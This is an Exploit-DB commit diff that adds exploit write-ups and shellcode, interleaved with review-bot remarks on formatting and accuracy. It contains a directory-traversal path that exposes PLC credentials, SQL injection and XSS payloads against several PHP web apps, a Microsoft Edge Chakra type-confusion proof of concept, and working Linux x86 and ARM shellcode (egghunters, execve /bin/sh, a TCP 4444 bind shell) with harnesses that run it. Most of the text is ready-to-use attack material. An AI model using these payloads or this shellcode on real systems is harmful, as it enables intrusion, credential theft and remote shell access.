DB: 2018-06-01

9 changes to exploits/shellcodes

Microsoft Edge Chakra - EntrySimpleObjectSlotGetter Type Confusion
TAC Xenta 511/911 - Directory Traversal
New STAR 2.1 - SQL Injection / Cross-Site Scripting
PHP Dashboards NEW 5.5 - 'email' SQL Injection
CSV Import & Export 1.1.0 - SQL Injection / Cross-Site Scripting
Grid Pro Big Data 1.0 - SQL Injection

Linux/x86 - EggHunter + access() Shellcode (38 bytes)
Linux/x86 - Bind (4444/TCP) Shell Shellcode (105 bytes)
Linux/ARM - Egghunter + /bin/sh Shellcode (32 bytes)
This commit is contained in:
Offensive Security 2018-06-01 05:01:45 +00:00
parent 89ee92def8
commit 0f18636d14
11 changed files with 646 additions and 0 deletions


@ -0,0 +1,32 @@
# Exploit Title: TAC Xenta 511 and 911 Credentials Disclosure
# Date: 25.05.2018
# Exploit Author: Marek Cybul
# Vendor Homepage:
https://download.schneider-electric.com/files?p_File_Name=TAC_Xenta_911_SDS-XENTA911.pdf
# Version: 5.17
# Schneider Electric TAC Xenta 911 and 511 PLCs
Directory traversal in help manuals allows for credentials extraction
Devices are not indexed by crawlers like Shodan or Censys due to
ancient SSL configuration,
needed to use old browser to support it (not even s_client, curl or
ncat could connect).
Example URI: /www/help/public/../../../sys/pswd
vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv
HTTP/1.0 200 OK
root
super user
/
/
/
password
0
900
3
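Review bot: The title recorded in the file header, `TAC Xenta 511 and 911 Credentials Disclosure`, differs from the index entry and commit title `TAC Xenta 511/911 - Directory Traversal`; one of the two should be changed so the CSV can be searched by the file's own heading. The `# Vendor Homepage:` field is left empty with its URL wrapped onto the following line, which breaks the header's one-field-per-line format. The advisory also gives no vendor-notification or fix status, which a defender consulting it would need; header lines such as `# Vendor notified: <date or "no">` and `# Fixed in: <version or "unknown">` (values to be supplied by the author) would complete it.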


@ -0,0 +1,31 @@
# Exploit Title: New STAR 2.1 - SQL Injection / Cross-Site Scripting
# Dork: N/A
# Date: 30.05.2018
# Exploit Author: Kağan Çapar
# Contact: kagancapar@gmail.com
# Vendor Homepage: https://codecanyon.net/item/new-star-listen-youtube-music/7486113
# Version: 2.1
# Category: Webapps
# Tested on: Kali Linux
# Description : 'ajax.php' working in the input field contains SQL
vulnerability. The search section also contains XSS vulnerability.
====================================================
# PoC : SQLi :
Parameter: name (GET)
Type: AND/OR time-based blind
Demo:
http://site.com/requests/ajax.php?newstar=login&name=admin&password=123456
Title: MySQL >= 5.0.12 AND time-based blind
Payload: newstar=login&name=admin' AND SLEEP(5) AND
'ddni'='ddni&password=123456
====================================================
# PoC : XSS :
Payload(1) :
http://site.com/play?mouse_search=%3E%27%3E%22%3E%3Cimg%20src=x%20onerror=alert%280%29%3E&p=1


@ -0,0 +1,44 @@
# Exploit Title: PHP Dashboards NEW v5.5 - 'Login' SQL Injection
# Dork: N/A
# Date: 31.05.2018
# Exploit Author: Kağan Çapar
# Contact: kagancapar@gmail.com
# Vendor Homepage: https://codecanyon.net/item/php-dashboards-v50-brand-new-enterprise-edition/21540104
# Version: 5.5
# Category: Webapps
# Tested on: Kali linux
# Description : PHP Dashboards is prone to an SQL-injection vulnerability
# because it fails to sufficiently sanitize user-supplied data before using
# it in an SQL query.Exploiting this issue could allow an attacker to
# compromise the application, access or modify data, or exploit latent
# vulnerabilities in the underlying database.
====================================================
# PoC : SQLi :
POST /php/save/user.php?mode=lookup HTTP/1.1
Host: site.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site.com/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 52
Cookie: PHPSESSID=phcubu5ohtdjnd6g1bmsncro87
Connection: keep-alive
email=test%40test.com&password=test123&dashboardKey=
Parameter: email (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: email=test@test.com' AND SLEEP(5) AND
'XnxG'='XnxG&password=test123&dashboardKey=
====================================================
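Review bot: The file's `# Exploit Title` names this a `'Login' SQL Injection` while the index entry added in the same commit records it as `PHP Dashboards NEW 5.5 - 'email' SQL Injection`; the header should use the same parameter-based title so the two stay consistent. The `# Description` paragraph is generic boilerplate and does not mention the affected endpoint or parameter that the PoC section then shows; a single sentence naming them in the description would make the header self-contained.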


@ -0,0 +1,31 @@
# Exploit Title: CSV Import & Export v1.1.0 - SQL Injection / Cross-Site
Scripting
# Dork: N/A
# Date: 30.05.2018
# Exploit Author: Kağan Çapar
# Contact: kagancapar@gmail.com
# Vendor Homepage: https://codecanyon.net/item/csv-import-export/21105509
# Version: 1.1.0
# Category: Webapps
# Tested on: Kali Linux
# Description : The 'offset' and 'db' parameters in the database table
preview query has vulnerabilities.
====================================================
# PoC : SQLi :
Parameter: offset (GET)
Type: UNION query
Demo:
https://site.com/live-preview/live-preview-db-tables.php?action=export_getInput&db=car-shop@localhost:3306&table=clients&order=asc&offset=30&limit=10
Title: Generic UNION query (NULL) - 10 columns
Payload: action=export_getInput&db=car-shop@localhost:3306&table=clients&order=asc&offset=30
UNION ALL SELECT
NULL,NULL,NULL,CONCAT(0x7178707671,0x78564b6846794858636354787350514d467a4863704d7a50735068495a6f7a5552625046616d6273,0x71786b7171),NULL,NULL,NULL,NULL,NULL,NULL--
STgb&limit=10
====================================================
# PoC : XSS :
Payload =
https://site.com/live-preview/live-preview-db-tables.php?action=export_getInput&db=%3E%27%3E%22%3E%3Cimg%20src=x%20onerror=alert%280%29%3E&table=clients&order=asc&offset=30&limit=10


@ -0,0 +1,61 @@
# Exploit Title: Grid Pro Big Data 1.0 - 'test.php' SQL Injection
# Dork: N/A
# Date: 30.05.2018
# Exploit Author: Kağan Çapar
# Vendor Homepage: https://codecanyon.net/item/grid-pro-big-data-table-view-data-grid-with-sort-search-and-filter-for-large-mysql-tables/20395348
# Version: 1.0
# Category: Webapps
# Tested on: Kali Linux
# Description : The multiple parameters in the 'test.php' query contain
SQLi vulnerabilities.
====================================================
# PoC : SQLi :
POST /release/pro_grid_big_data/php/test.php HTTP/1.1
Host: site.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site.com/release/pro_grid_big_data/index.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 430
Connection: keep-alive
page=1&on_home=5&table_name=be&params%5B0%5D%5Btype%5D=text&params%5B0%5D%5Bvalue%5D=&params%5B0%5D%5Bname%5D=Name&params%5B1%5D%5Btype%5D=text&params%5B1%5D%5Bvalue%5D=&params%5B1%5D%5Bname%5D=Surname&params%5B2%5D%5Btype%5D=num_range&params%5B2%5D%5Bvalue%5D%5B%5D=&params%5B2%5D%5Bvalue%5D%5B%5D=&params%5B2%5D%5Bname%5D=Age&params%5B3%5D%5Btype%5D=date&params%5B3%5D%5Bvalue%5D=&params%5B3%5D%5Bname%5D=Born_date&ordering=none
Parameter: on_home (POST)
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: page=2&on_home=5 UNION ALL SELECT
CONCAT(CONCAT('qjbqq','vVWAgYsZnIsAkqERYDgZibFieBTaDlfAymtKvnaO'),'qxbpq'),NULL,NULL,NULL--
LEgG&table_name=be&params[0][type]=text&params[0][value]=&params[0][name]=Name&params[1][type]=text&params[1][value]=&params[1][name]=Surname&params[2][type]=num_range&params[2][value][]=&params[2][value][]=&params[2][name]=Age&params[3][type]=date&params[3][value]=&params[3][name]=Born_date&ordering=none
Parameter: params[0][value] (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload:
page=2&on_home=5&table_name=be&params[0][type]=text&params[0][value]=%' AND
1906=1906 AND
'%'='&params[0][name]=Name&params[1][type]=text&params[1][value]=&params[1][name]=Surname&params[2][type]=num_range&params[2][value][]=&params[2][value][]=&params[2][name]=Age&params[3][type]=date&params[3][value]=&params[3][name]=Born_date&ordering=none
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload:
page=2&on_home=5&table_name=be&params[0][type]=text&params[0][value]=%' AND
SLEEP(5) AND
'%'='&params[0][name]=Name&params[1][type]=text&params[1][value]=&params[1][name]=Surname&params[2][type]=num_range&params[2][value][]=&params[2][value][]=&params[2][name]=Age&params[3][type]=date&params[3][value]=&params[3][name]=Born_date&ordering=none
Parameter: params[0][name] (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload:
page=2&on_home=5&table_name=be&params[0][type]=text&params[0][value]=&params[0][name]=Name)
AND SLEEP(5) AND
(2977=2977&params[1][type]=text&params[1][value]=&params[1][name]=Surname&params[2][type]=num_range&params[2][value][]=&params[2][value][]=&params[2][name]=Age&params[3][type]=date&params[3][value]=&params[3][name]=Born_date&ordering=none
====================================================


@ -0,0 +1,59 @@
/*
function opt(w, arr) {
arr[0] = 1.1;
let res = w.event;
arr[0] = 2.3023e-320;
return res;
}
let arr = [1.1];
for (let i = 0; i < 10000; i++) {
opt(window, arr);
}
The above code will be compiled as follows:
000001a8`8000122b 48b8503dcfd5ff7f0000 mov rax,offset chakra!DOMFastPath<7>::EntrySimpleObjectSlotGetter (00007fff`d5cf3d50) // w.event
000001a8`80001235 48ffd0 call rax
000001a8`80001238 488b8e30bdf0ff mov rcx,qword ptr [rsi-0F42D0h]
000001a8`8000123f f2480f104158 movsd xmm0,mmword ptr [rcx+58h]
000001a8`80001245 f2490f11442418 movsd mmword ptr [r12+18h],xmm0 // arr[0] = 2.3023e-320;
...
As you can see, there's no "ImplicitCallFlags" check after the call to the "EntrySimpleObjectSlotGetter" method. The code was generated based on the assumption that the method has no side effects. But in fact, the method can have side effects. The method wraps the return value using the "CrossSite::MarshalVar" method which traverses up the prototype chain of the given object using the "GetPrototype" method, since the "GetPrototype" method may invoke the "getPrototypeOf" handler of a Proxy object, changing the type of the array in the handler will lead to type confusion.
PoC:
*/
function opt(w, arr) {
arr[0] = 1.1;
let res = w.event;
arr[0] = 2.3023e-320;
return res;
}
function main() {
let f = document.body.appendChild(document.createElement('iframe'));
f.contentWindow;
for (let i = 0; i < 100000; i++) {
opt(window, [1.1]);
}
let set_callback = new f.contentWindow.Function('callback', `
window.__lookupSetter__('event').call(parent, new Proxy({}, {
getPrototypeOf() {
callback();
return {};
}
}));`);
let arr = [1.1];
set_callback(() => {
arr[0] = {};
});
opt(window, arr);
alert(arr);
}
main();
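Review bot: The warm-up loop count differs between the explanation and the PoC: the commented listing at the top runs `opt` 10000 times, while `main()` runs it 100000 times, and nothing in the file says whether the larger count is needed to reach the JIT output shown. A comment above the loop, `// 100000 iterations: warm up until the JIT emits the unchecked slot-getter call shown above`, would tie the two together (I cannot confirm the threshold from the page, so the author should verify it). `f.contentWindow;` on its own line reads like a no-op; if it is there to force the frame's global object to be created before the setter lookup, a comment saying so would record the intent.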


@ -5984,6 +5984,7 @@ id,file,description,date,author,type,platform,port
44759,exploits/multiple/dos/44759.html,"Skia and Firefox - Integer Overflow in SkTDArray Leading to Out-of-Bounds Write",2018-05-25,"Google Security Research",dos,multiple,
44768,exploits/php/dos/44768.txt,"Symfony 2.7.0 < 4.0.10 - Denial of Service",2018-05-26,"Federico Stange",dos,php,
44802,exploits/linux/dos/44802.py,"Siemens SIMATIC S7-300 CPU - Remote Denial of Service",2018-05-30,t4rkd3vilz,dos,linux,
44817,exploits/windows/dos/44817.js,"Microsoft Edge Chakra - EntrySimpleObjectSlotGetter Type Confusion",2018-05-31,"Google Security Research",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -39476,3 +39477,8 @@ id,file,description,date,author,type,platform,port
44803,exploits/macos/webapps/44803.txt,"Yosoro 1.0.4 - Remote Code Execution",2018-05-30,"Carlo Pelliccioni",webapps,macos,
44804,exploits/php/webapps/44804.txt,"MachForm < 4.2.3 - SQL Injection / Path Traversal / Upload Bypass",2018-05-30,"Amine Taouirsa",webapps,php,80
44805,exploits/php/webapps/44805.txt,"Dolibarr 7.0.0 - SQL Injection",2018-05-30,Sysdream,webapps,php,80
44809,exploits/hardware/webapps/44809.txt,"TAC Xenta 511/911 - Directory Traversal",2018-05-31,"Marek Cybul",webapps,hardware,
44813,exploits/php/webapps/44813.txt,"New STAR 2.1 - SQL Injection / Cross-Site Scripting",2018-05-31,"Kağan Çapar",webapps,php,
44814,exploits/php/webapps/44814.txt,"PHP Dashboards NEW 5.5 - 'email' SQL Injection",2018-05-31,"Kağan Çapar",webapps,php,
44815,exploits/php/webapps/44815.txt,"CSV Import & Export 1.1.0 - SQL Injection / Cross-Site Scripting",2018-05-31,"Kağan Çapar",webapps,php,
44816,exploits/php/webapps/44816.txt,"Grid Pro Big Data 1.0 - SQL Injection",2018-05-31,"Kağan Çapar",webapps,php,



@ -888,3 +888,6 @@ id,file,description,date,author,type,platform
44738,shellcodes/linux_x86/44738.c,"Linux/x86 - Reverse (10.10.2.4:4444/TCP) Shell Shellcode (68 bytes)",2018-05-24,"Nuno Freitas",shellcode,linux_x86
44740,shellcodes/linux_x86/44740.c,"Linux/x86 - Reverse (10.0.7.17:4444/TCP) Shell (/bin/sh) Shellcode (101 Bytes)",2018-05-24,"Jonathan Crosby",shellcode,linux_x86
44791,shellcodes/linux_x86/44791.c,"Linux/x86 - Bind (5555/TCP) Shell Shellcode (98 bytes)",2018-05-28,Luca,shellcode,linux_x86
44807,shellcodes/linux_x86/44807.c,"Linux/x86 - EggHunter + access() Shellcode (38 bytes)",2018-05-31,"Paolo Perego",shellcode,linux_x86
44808,shellcodes/linux_x86/44808.c,"Linux/x86 - Bind (4444/TCP) Shell Shellcode (105 bytes)",2018-05-31,"Paolo Perego",shellcode,linux_x86
44811,shellcodes/arm/44811.c,"Linux/ARM - Egghunter + /bin/sh Shellcode (32 bytes)",2018-05-31,"Ken Kitahara",shellcode,arm

1 id file description date author type platform
888 44738 shellcodes/linux_x86/44738.c Linux/x86 - Reverse (10.10.2.4:4444/TCP) Shell Shellcode (68 bytes) 2018-05-24 Nuno Freitas shellcode linux_x86
889 44740 shellcodes/linux_x86/44740.c Linux/x86 - Reverse (10.0.7.17:4444/TCP) Shell (/bin/sh) Shellcode (101 Bytes) 2018-05-24 Jonathan Crosby shellcode linux_x86
890 44791 shellcodes/linux_x86/44791.c Linux/x86 - Bind (5555/TCP) Shell Shellcode (98 bytes) 2018-05-28 Luca shellcode linux_x86
891 44807 shellcodes/linux_x86/44807.c Linux/x86 - EggHunter + access() Shellcode (38 bytes) 2018-05-31 Paolo Perego shellcode linux_x86
892 44808 shellcodes/linux_x86/44808.c Linux/x86 - Bind (4444/TCP) Shell Shellcode (105 bytes) 2018-05-31 Paolo Perego shellcode linux_x86
893 44811 shellcodes/arm/44811.c Linux/ARM - Egghunter + /bin/sh Shellcode (32 bytes) 2018-05-31 Ken Kitahara shellcode arm

shellcodes/arm/44811.c Normal file

@ -0,0 +1,97 @@
/*
Linux/ARM (Raspberry Pi) - Egghunter + /bin/sh Shellcode (32 bytes)
------------------------------
// If your shellcode in higer address, use following egghunter.
pi@raspberrypi:~ $ cat egghunter-higher.s
.section .text
.global _start
_start:
.code 32
add r3, pc, #1 // switch to thumb mode
bx r3
.code 16
adr r1, startpoint // set r1 to start point address
ldr r2, egg // set r2 to egg's value
next_addr:
add r1, r1, #1 // increment scan address
ldr r3, [r1] // set r3 to the value stored in r1's address
cmp r2, r3 // compare values
bne next_addr // if failed to find egg, jump to next address
mov r3, pc // switch to arm mode
bx r3
.code 32
mov pc, r1 // jump to found address
egg:
.ascii "\x50\x90\x50\x90"
startpoint:
pi@raspberrypi:~ $
------------------------------
// If your shellcode in lower address, use following egghunter.
pi@raspberrypi:~ $ cat egghunter-lower.s
.section .text
.global _start
_start:
.code 32
add r3, pc, #1 // switch to thumb mode
bx r3
.code 16
adr r1, startpoint // set r1 to start point address
ldr r2, egg // set r2 to egg's value
next_addr:
sub r1, r1, #1 // increment scan address
ldr r3, [r1] // set r3 to the value stored in r1's address
cmp r2, r3 // compare values
bne next_addr // if failed to find egg, jump to next address
startpoint:
mov r3, pc // switch to arm mode
bx r3
.code 32
mov pc, r1 // jump to found address
egg:
.ascii "\x50\x90\x50\x90"
pi@raspberrypi:~ $
------------------------------
*/
#include <stdio.h>
#include <string.h>
// If your shellcode in higer address, use following egghunter.
unsigned char egghunter[] = \
"\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x05\xa1\x04\x4a\x01\x31\x0b\x68\x9a\x42\xfb\xd1\x7b\x46\x18\x47\x01\xf0\xa0\xe1\x50\x90\x50\x90";
unsigned char egg[] = \
"\x50\x90\x50\x90" // egg tag
"\x01\x30\x8f\xe2\x13\xff\x2f\xe1" // execve('/bin/sh')
"\x49\x40\x52\x40\x01\xa0\xc2\x71"
"\x0b\x27\x01\xdf\x2f\x62\x69\x6e"
"\x2f\x73\x68\x41";
// If your shellcode in lower address, use following egghunter.
//unsigned char egghunter[] = \
//"\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa1\x04\x4a\x01\x39\x0b\x68\x9a\x42\xfb\xd1\x7b\x46\x18\x47\x01\xf0\xa0\xe1\x50\x90\x50\x90";
void main()
{
printf("Egg hunter shellcode Length: %d\n", strlen(egghunter));
printf("Egg shellcode Length: %d\n", strlen(egg));
int (*ret)() = (int(*)())egghunter;
ret();
}
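Review bot: `void main()` together with `printf("... %d\n", strlen(...))` in the harness is non-conforming twice over: `main` must return `int`, and `strlen` yields `size_t`, so the lines should read `int main(void)` and `printf("Egg hunter shellcode Length: %zu\n", strlen(egghunter));` (the same `%d`/`size_t` mismatch appears in 44807.c and 44808.c in this commit). In the egghunter-lower listing the comment on `sub r1, r1, #1` says `// increment scan address` although the instruction decrements; it should read `// decrement scan address`. The hunter dereferences every byte address with `ldr r3, [r1]` and has no fault handling — unlike the x86 variant in this commit, which probes each page with access() first — so the header should state that the egg must lie in the same contiguously mapped region as the hunter and that the loop depends on unaligned word loads being permitted, since either assumption failing terminates the process. The file also does not record the build flags that make the data array callable; a `// build: <flags used by the author>` line would make the harness reproducible.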


@ -0,0 +1,129 @@
/*
; Filename: egghunter.nasm
; Author: Paolo Perego <paolo@codiceinsicuro.it>
; Website: https://codiceinsicuro.it
; Blog post: https://codiceinsicuro.it/slae/
; Twitter: @thesp0nge
; SLAE-ID: 1217
; Purpose: This is the first stage of our payload. An egg-hunter shellcode
; looping through memory and jumping on the payload after the
; second egg found in memory.
global _start
section .text
_start:
xor ecx, ecx
mul ecx
next_page:
or dx, 0xfff
next_addr:
; EDX is 4096 here, that is the value of PAGE_SIZE constant
inc edx
; EBX is our memory cursor
lea ebx, [edx+0x4]
xor eax, eax
; access is defined as #define __NR_acces 33 in
; /usr/include/i386-linux-gnu/asm/unistd_32.h:
;
; system call prototype is:
; int access(const char *pathname, int mode);
mov al, 0x21
int 0x80
cmp al, 0xf2 ; 0xf2 is the opcode for EFAULT. If my register
; has this value, a signal for a invalid page
; access it has been received
jz next_page
mov eax, key
mov edi, edx
scasd
jnz next_addr
scasd
jnz next_addr
; At this point we are at the very beginning of our shellcode, after
; the second key. We can jump to it
jmp edi
section .data
key equ 0xdeadbeef
; Filename: execve.nasm
; Author: Paolo Perego <paolo@codiceinsicuro.it>
; Website: https://codiceinsicuro.it
; Blog post: https://codiceinsicuro.it/slae/
; Twitter: @thesp0nge
; SLAE-ID: 1217
; Purpose: This is the default payload for the egg hunter demo. It will
; execute "/bin/sh" using execve() system call.
global _start
dd 0xdeadbeef
dd 0xdeadbeef
section .text
_start:
xor eax, eax ; init EAX to 0
push eax ; pushing 0 to the stack to be used as NULL pointer
; execve is defined as #define __NR_execve 11 in
; /usr/include/i386-linux-gnu/asm/unistd_32.h:
;
; system call prototype is:
; int execve(const char *filename, char *const argv[], char *const
envp[]);
push 0x68732f2f ; pushing //bin/sh into the stack
push 0x6e69622f ; the init double / is for alignment purpose
mov ebx, esp ; pointer to *filename
push eax ; pushing in the stack a pointer to NULL
mov edx, esp ; I don't care about environment here
push eax
mov ecx, esp ; I don't even care about passing arguments to
; my /bin/sh
mov al, 0xb ; execve = 11
int 0x80
*/
#include<stdio.h>
#include<string.h>
unsigned char egg_hunter[] = \
"\x31\xc9\xf7\xe1\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\x31\xc0\xb0\x21\xcd\x80\x3c\xf2\x74\xed\xb8\xef\xbe\xad\xde\x89\xd7\xaf\x75\xe8\xaf\x75\xe5\xff\xe7";
unsigned char code[] = \
"\xef\xbe\xad\xde\xef\xbe\xad\xde\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x50\x89\xe1\xb0\x0b\xcd\x80";
int main(int argc, char **argv)
{
printf("Shellcode Length: %d\n", strlen(code));
printf("Egghunter Length: %d\n", strlen(egg_hunter));
int (*ret)() = (int(*)())egg_hunter;
ret();
}
--
$ cd /pub
$ more beer
I pirati della sicurezza applicativa: https://codiceinsicuro.it
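Review bot: The comment on `cmp al, 0xf2` calls 0xf2 "the opcode for EFAULT", but it is the low byte of the syscall's return value -EFAULT (-14), which is what signals an unmapped page; the comment should read `; AL == 0xf2: access() returned -EFAULT (-14), so this page is unmapped`. Likewise `; EDX is 4096 here, that is the value of PAGE_SIZE constant` is inaccurate — after `or dx, 0xfff` and `inc edx`, EDX holds the start of the next 4 KiB page, not the constant 4096 — so `; EDX now points at the next page boundary (PAGE_SIZE = 4096)` would be correct. `key equ 0xdeadbeef` under `section .data` emits nothing, since `equ` only defines an assembler symbol; the `section .data` line is dead and can be dropped. The harness does not document how it was built so that control can enter the writable `egg_hunter[]` array; a `// build: <flags used by the author>` comment would make the listing reproducible.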


@ -0,0 +1,153 @@
/*
; Filename: tcp_bind_shellcode_light.nasm
; Author: Paolo Perego <paolo@codiceinsicuro.it>
; Website: https://codiceinsicuro.it
; Twitter: @thesp0nge
; SLAE-ID: 1217
; Purpose: binds on TCP port 4444 and spawn a shell on incoming
connections.
global _start
section .text
_start:
; Creating the socket.
;
; int socket(int domain, int type, int protocol);
;
; socket() is defined as #define __NR_socket 359 on
/usr/include/i386-linux-gnu/asm/unistd_32.h
; AF_INET is defined as 2 in /usr/include/i386-linux-gnu/bits/socket.h
; SOCK_STREAM is defined as 1 in
/usr/include/i386-linux-gnu/bits/socket_type.h
xor eax, eax
mov ebx, eax
mov ecx, eax
mov edx, eax
mov ax, 0x167 ; 359 in decimal
mov bl, 0x2
mov cl, 0x1
int 0x80 ; sfd = socket(AF_INET, SOCK_STREAM, 0);
mov ebx, eax ; storing the socket descriptor into EBX for next syscall
;push eax ; save socket descriptor into the stack
; Binding the socket to 0.0.0.0 address at port 4444
;
; int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
;
;
; bind() is defined as #define __NR_bind 361 on
/usr/include/i386-linux-gnu/asm/unistd_32.h
xor eax, eax
mov ax, 0x169 ; 361 in decimal
xor ecx, ecx
push ecx ; pushing 32 bit INADDR_ANY
push word 0x5c11 ; pushing PORT 4444 in network byte order
push word 0x2 ; pushing AF_INET as sin_family
mov ecx, esp ; now ECX points to the my_addr data structure
mov dl, 0x10 ; sizeof(my_addr) = 16 bytes
int 0x80 ; bind(sfd, (struct sockaddr *) &my_addr, sizeof(my_addr));
; Listening on opened socket bound to port 4444
;
; int listen(int sockfd, int backlog);
;
; listen() is defined as #define __NR_listen 363 in
/usr/include/i386-linux-gnu/asm/unistd_32.h
xor ecx, ecx
xor eax, eax
mov ax, 0x16b ; 363 in decimal
int 0x80 ; listen(sfd, 0);
; Accepting incoming connection on listening socket
;
; int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
;
; accept() is not defined as syscall in
/usr/include/i386-linux-gnu/asm/unistd_32.h.
; Instead accept4() is defined as #define __NR_accept4 364.
;
; From the man page, accept4() has the followint prototype:
; int accept4(int sockfd, struct sockaddr *addr, socklen_t *addrlen, int
flags);
;
; The last integer, as from the man page, if set to 0 makes the
; accept4() call to behave as the same as the accept()
xor eax, eax
mov ax, 0x16c ; 364 in decimal
push ecx ; ECX is 0, pushing on the stack
mov esi, ecx
mov ecx, esp ; ECX now points to a zero bytes region from the stack.
mov edx, esp
int 0x80 ; cfd = accept4(sfd, NULL, NULL, 0);
mov ebx, eax ; Saving socket descript resulting from accept4 into EBX
; Duplicating descriptor 0, 1, 2 to the socket opened by client
;
; int dup2(int oldfd, int newfd);
;
; dup2 is defined as #define __NR_dup2 63 in
/usr/include/i386-linux-gnu/asm/unistd_32.h
xor ecx, ecx
mov cl, 2
xor eax, eax
dup2:
mov al, 0x3F ; 63 in decimal
int 0x80 ; duplicating file descriptors in backwards order; from 2 to 0
dec ecx
jns dup2
; Executing shell
;
; int execve(const char *filename, char *const argv[], char *const envp[]);
; execve() is defined as #define __NR_execve 11 on
/usr/include/i386-linux-gnu/asm/unistd_32.h
xor eax, eax
push eax ; The NULL byte
push 0x68732f2f ; "sh//". The second '\' is used to align our command into
the stack
push 0x6e69622f ; "nib/"
mov ebx, esp ; EBX now points to "/bin//sh"
xor ecx, ecx
xor edx, edx
mov al, 0xB ; 11 in decimal
int 0x80
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xc0\x89\xc3\x89\xc1\x89\xc2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\x31\xc0\x66\xb8\x69\x01\x31\xc9\x51\x66\x68\x15\xb3\x66\x6a\x02\x89\xe1\xb2\x10\xcd\x80\x31\xc9\x31\xc0\x66\xb8\x6b\x01\xcd\x80\x31\xc0\x66\xb8\x6c\x01\x51\x89\xce\x89\xe1\x89\xe2\xcd\x80\x89\xc3\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80";
int main(int argc, char **argv)
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
--
$ cd /pub
$ more beer
I pirati della sicurezza applicativa: https://codiceinsicuro.it
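Review bot: The comment `; cfd = accept4(sfd, NULL, NULL, 0);` does not match the code above it: `mov ecx, esp` and `mov edx, esp` point both addr and addrlen at the zero dword just pushed, so they are non-NULL and the kernel will write the returned address length into that stack slot; the comment should read `; cfd = accept4(sfd, (struct sockaddr *)esp, (socklen_t *)esp /* *addrlen = 0 */, 0);` or ECX/EDX should be zeroed so the code matches the comment. The bind block pushes only 8 bytes (family, port, INADDR_ANY) but passes `mov dl, 0x10` as addrlen, so the kernel reads sin_zero from whatever was already on the stack — harmless for AF_INET, which ignores those bytes, but a comment such as `; remaining 8 bytes (sin_zero) are uninitialised; AF_INET bind ignores them` would stop a reader from hunting for a bug. The numbers 359–364 used for socket/bind/listen/accept4 are the i386 direct socket syscalls, which exist only on kernels that provide them (Linux 4.3 and later); the header should state this kernel requirement instead of only citing the header file path.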